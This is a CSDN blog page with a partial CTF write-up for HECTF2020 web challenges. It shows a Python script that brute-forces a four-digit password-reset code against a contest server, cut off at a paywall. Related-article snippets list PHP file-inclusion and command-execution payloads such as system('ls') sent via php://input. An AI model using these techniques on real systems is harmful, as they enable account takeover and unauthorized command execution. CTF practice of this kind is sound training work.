HECTF2020web部分题wp

最新推荐文章于 2023-10-07 14:11:39 发布
最新推荐文章于 2023-10-07 14:11:39 发布
阅读量1.6k 收藏
点赞数 3
分类专栏: wp 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46330722/article/details/110141844
版权

HECTF


这两周太忙了,考试和实验都堆在一起了,人没了。上周末抽空做了一下HECTF,签到关机一气呵成。

签到

在这里插入图片描述点一下忘记密码
在这里插入图片描述然后就输入手机号,并输入四位验证码。手机号可以在登陆界面的注释中找到,这里说是四位数验证码,那就应该是爆破了。菜鸡的脚本附上

import requests

url1='http://121.196.32.184:8080/findpass.php?num=15970773575&check='
url2='&next=%E4%B8%8B%E4%B8%80%E6%AD%A5'

for i in range(0,10):
    for j in range(0,10):
        for k in range(0,10):
            for l in range(0,10):
                pay=str(i)+str(j)+str(k)+str(l)
                url=url1+pay+url2
                res=requests.get(url)
                if len
最低0.47元/天 解锁文章
noViC4
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
HECTF 2022
weixin_57449426的博客
11-07 521
师傅们都tql
CTFshow web-web3 WP
qq_45427131的博客
05-11 652
CTFshow Web-Web3 文件包含+命令执行(伪协议) Php://filter/read=convert.base64-encode/resource=文件名 用php伪协议读取经过base64加密之后的文件 php://input php://input可以访问请求的原始数据的只读流,将请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。 注:当enctype=”multipa
ROSE笔记-ctf.show_web3-WP
居上
11-05 499
ctf.show_web3 根据提示,判断类型为文件包含 payload:/?url=php://input,然后用burpsuite抓包 在请求body里写上 <?php system("ls")?> 查看一些当前目录下文件 出现名为ctf_go_go_go的文件 继续在请求头中写入 <?php system("cat ctf_go_go_go")?> 得到flag ...
HECTF2022-reverse部分
weixin_61154173的博客
11-28 219
HECTF2022部分re
ctfshow-web3(伪协议php://input的利用)
最新发布
Welcome To Myon'Blog !
10-07 1291
这是一个只读信息流,当请求方式是post的,并且enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据,当enctype等于”multipart/form-data”时php://input是无效的。利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码。,php执行时会将post内容当作文件内容,从而导致。存在文件包含时直接使用PHP伪协议。,当传入的参数作为文件名打开时,可以。
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2201
CTFShow-WEB入门篇--信息搜集详细Wp
UNCTF2021 部分wp.pdf
12-10
UNCTF2021 部分 WP报告 本文档对 UNCTF2021 部分 WP 进行了详细的解报告,涵盖了 WEB、PHP、MYSQL、CRYPTO 等方面的知识点。 1. Fuzz_md5Get 和 Post 传参绕过 在 UNCTF2021 的 WEB 部分中,我们遇到了一...
2020易霖博杯 web wp.md
04-02
2020易霖博杯 web wp. 参照大佬们比较好的思路写的WP 方便学习
实验吧WEBWP
08-10
这是自己做的一个实验吧的十七到目的WP,其中也有别人的WP
wpWeb服务编程案例
04-03
在Windows Phone(简称WP)平台上,开发者可以利用Web服务编程技术来创建强大的应用程序,与远程服务器进行数据交换,实现丰富的功能。本案例旨在探讨如何在Windows Phone设备上开发Web服务应用,通过集成Web服务,...
2020工业控制安全大赛试.zip
09-12
“中能融合杯”第六届全国工控系统信息安全攻防竞赛于9月12日...除此之外,赛设计也更具特色,目总共分为15道,4个关卡:第一关卡为签到;第二关卡为传统的互联网竞赛目;第三、四关卡为工业相关技能竞赛
ctfshow-WEB-web3
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块的第3关是一个文件包含漏洞,include()函数包含的文件会被执行,我们使用PHP伪协议配合抓包工具进行命令执行,从而获取flag 这一关的flag就存放在网站跟路径下的文件中 php://input可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,enctype=multipart/form-data"时,php:/input将会无效 页面中显示了部分源码,明显是引导我们利用文件包含漏洞进行操作,源码中的inc...
ctfshow web3
weixin_51866363的博客
11-20 4325
** ## **ctfshow web3** 这一道就不像web2那么简单了,不过在借助web安全神器burpsuite的情况下还是比较容易的。 接下来就来说明一下这道的解法以及浅显地介绍一下burp工具的使用吧!!! 看到这道目提示我们可以知道这是一道php伪协议+文件包含漏洞的目,先进行测试看看能不能通过 file:////etc/pas...
2021 HECTF 部分WP
qq_52988816的博客
11-17 968
MISC 快来公众号ya 关注公众号回复签到 SangFor{AaKjtQr_OjJpdA3QwBV_ndsKdn3vPgc_} JamesHarden 一个未知文件,拖入010 发现是zip的前缀,改个文件后缀压缩 是一个.class文件,没见过,用记事本打开 发现疑是凯撒密码的字符串 解密 hectf{we1c0me_t0_h3ct6_!} 捉迷藏 解压是个word文件,打开后没发现啥,查看是否隐藏了字段,也没有发现 托010 是个压缩包,改ziP解压 全是.xml 挨个看 在document.xm
萌新的第一场CTF——HECTF
mumuzi的博客
11-25 3041
第一次打真正意义上的CTF比赛 之前有名必报,之后发现只会做签到 祥云杯也就康康就走了 这几天看了知乎的大佬,只学了3个月都能拿30名,而我只能拿75感觉有点捞 所以我就把我能做起的WP给大家分享一下 MISC 1.png: 对于图片,最简单的要有几种思想:1.属性,2.winhex头尾,3.图片高度,4.stegsolve,5.foremost,6.LSB隐写。 这道后用winhex打开后,发现文件尾有base64编码:M2I3OWJkZjhmY2ZkNTVmZH0= 解码得到:3b79bdf8fc
HECTF 部分wp
Sentiment的博客
11-15 4479
Web EDGnb(签到) docker run -it moth404/edgnb 执行后发现有很多flag,但都是空的,推测flag应该不在容器内部 查看docker history,容器构建记录 docker history moth404/edgnb 发现flag但是显示不全 用 --no-trunc=true进行不截断输出,看到flag docker history moth404/edgnb --no-trunc=true 或者可以在dockerhub上直接看记录 mmmmd5d5d
之旅第46站,CTFshow 内部赛web03
cc菜的一批
04-10 918
感谢ctf show平台提供目 打开目,是一张图片,猜测是连接菜刀,密码是cai 连接成功了。在根目录发现flag,但是没有权限打开。 需要提权,根据提示,漏洞大约每两分钟触发一次,查看一下定时任务。 cat /etc/crontab 看到了一个 每1分钟 执行一次的任务,重启nginx。 查资料找到 漏洞编号:SSV-92538 https://www.seebug.org/vul...
[HECTF 2022]—Web WirteUp
Sentiment的博客
11-08 594
HECTF 2022
羊城杯2020 wp
08-18
羊城杯2020是一场年度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城杯聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值